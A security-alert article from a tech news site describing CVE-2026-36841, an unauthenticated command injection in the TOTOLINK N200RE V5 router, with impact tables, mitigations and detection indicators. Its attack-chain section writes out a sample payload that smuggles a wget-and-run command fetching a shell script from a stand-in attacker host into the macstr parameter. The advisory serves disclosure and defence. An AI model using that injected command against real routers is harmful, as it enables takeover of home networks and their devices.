Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

865+ Articles
122+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-36841: TOTOLINK N200RE V5 Command Injection
CVE-2026-36841: TOTOLINK N200RE V5 Command Injection

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITYCRITICALCVE-2026-36841

CVE-2026-36841: TOTOLINK N200RE V5 Command Injection

A critical CVSS 9.8 command injection vulnerability in TOTOLINK N200RE V5 allows unauthenticated remote code execution via the macstr and bandstr parameters in the formMapDelDevice function.

Dylan H.

Security Team

April 30, 2026
5 min read

Affected Products

  • TOTOLINK N200RE V5

Executive Summary

A critical command injection vulnerability (CVE-2026-36841) has been disclosed in the TOTOLINK N200RE V5 router. The flaw exists in the formMapDelDevice function, where the macstr and bandstr parameters are passed to system commands without proper sanitization. With a CVSS score of 9.8 (Critical), this vulnerability enables unauthenticated remote code execution with no user interaction required.

CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

TOTOLINK N200RE V5 is a consumer and small-business Wi-Fi router. Routers of this type are frequently exposed directly to the internet or used in home office environments with minimal network segmentation, making this vulnerability particularly dangerous to end users.


Vulnerability Overview

AttributeValue
CVE IDCVE-2026-36841
CVSS Score9.8 (Critical)
TypeCommand Injection (OS Command Injection)
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
Confidentiality / Integrity / AvailabilityHigh / High / High
Published2026-04-29
Affected ComponentformMapDelDevice function
Vulnerable Parametersmacstr, bandstr

Affected Products

ProductVersionStatus
TOTOLINK N200REV5Vulnerable — patch status unknown

Technical Details

What Is a Command Injection Vulnerability?

A command injection flaw occurs when user-supplied input is incorporated into an OS-level command without adequate sanitization or escaping. An attacker can inject additional shell commands using metacharacters (;, |, &&, `), which the underlying shell then executes with the privileges of the vulnerable application — often root in the case of embedded router firmware.

Vulnerable Function: formMapDelDevice

The formMapDelDevice function in the TOTOLINK N200RE V5 firmware handles the deletion of devices from a network map. Both the macstr and bandstr parameters accept user-controlled input that is concatenated into shell commands without sanitization.

Attack Chain

1. Attacker identifies TOTOLINK N200RE V5 accessible on the network
2. Attacker crafts an HTTP request to the formMapDelDevice endpoint
3. Malicious payload injected into macstr or bandstr parameter:
   e.g., macstr=AA:BB:CC:DD:EE:FF;wget http://attacker.com/shell.sh -O /tmp/shell.sh;sh /tmp/shell.sh
4. Router firmware executes the injected commands as root
5. Attacker achieves full persistent control over the device
6. Attacker pivots to devices on the LAN or modifies DNS/routing tables

Why CVSS 9.8?

The near-maximum score reflects: no authentication required, no user interaction, network accessibility, and low attack complexity. All three impact dimensions (Confidentiality, Integrity, Availability) are rated High, as full RCE gives an attacker unrestricted access to the device and the network behind it.


Impact Assessment

Impact AreaDescription
Remote Code ExecutionFull code execution on the router as root
Network PivotingAttacker gains foothold inside the LAN
DNS HijackingModify upstream DNS to redirect traffic or enable phishing
Credential TheftIntercept unencrypted network traffic from LAN clients
Botnet RecruitmentRouter added to a botnet for DDoS, spam, or proxy services
Persistent BackdoorAttacker installs persistent implant in router firmware
Traffic InterceptionMan-in-the-middle attacks against LAN devices

Recommendations

Immediate Actions

  1. Check your router model and firmware version — Determine if your TOTOLINK N200RE is running V5 firmware
  2. Check for a firmware update — Visit the TOTOLINK support portal for any available patches for the N200RE V5
  3. Disable remote management — Ensure the router's web interface is not accessible from the WAN/internet side
  4. Place behind a firewall — If the router must remain in service, ensure it is not directly internet-exposed

Network-Level Mitigations

- Block inbound access to the router's web management interface from external IPs
- Restrict LAN-side access to the admin interface to specific trusted IP addresses
- Consider placing the router behind an upstream firewall that filters inbound connections
- Monitor outbound connections from the router for unexpected destinations

Longer-Term Recommendations

  1. Replace the device if no firmware patch is released in a reasonable timeframe — TOTOLINK N200RE V5 may be end-of-life
  2. Upgrade to a supported router from a vendor with a track record of security patching
  3. Segment your network — Isolate IoT and consumer devices from workstations and servers
  4. Enable router logging and monitor for unusual processes or outbound traffic

Detection Indicators

IndicatorDescription
Unexpected outbound connections from the routerPossible C2 or exfiltration
DNS resolution changes on LAN clientsPotential DNS hijack via compromised router
New admin accounts on the routerPost-exploitation persistence mechanism
Unusual CPU/memory usage on the routerMay indicate cryptominer or botnet activity
HTTP requests to formMapDelDevice with shell metacharactersActive exploitation attempt

Post-Remediation Checklist

  1. Confirm firmware patched or device replaced
  2. Reset router to factory defaults after patching — existing compromise may persist
  3. Change all admin credentials after reset
  4. Review LAN devices for signs of compromise resulting from router control
  5. Update DNS settings on all LAN clients to ensure they point to trusted resolvers
  6. Monitor network traffic for anomalies for at least 30 days post-remediation

References

  • NIST NVD — CVE-2026-36841
  • TOTOLINK Support Portal
#CVE-2026-36841#TOTOLINK#Command Injection#Router#RCE#Critical

Related Articles

CVE-2026-7037: Unauthenticated OS Command Injection in Totolink A8000RU

A critical CVSS 9.8 OS command injection vulnerability in the Totolink A8000RU router allows unauthenticated remote attackers to execute arbitrary commands via the pptpPassThru parameter in the CGI handler. No patch available.

4 min read

CVE-2026-6112: Totolink A7100RU OS Command Injection via setRadvdCfg

A critical OS command injection vulnerability (CVSS 9.8) in Totolink A7100RU firmware allows unauthenticated remote attackers to execute arbitrary...

3 min read

CVE-2026-6113: Totolink A7100RU OS Command Injection via setTtyServiceCfg

A critical OS command injection flaw (CVSS 9.8) in Totolink A7100RU enables remote unauthenticated attackers to execute arbitrary commands by manipulating...

2 min read
Back to all Security Alerts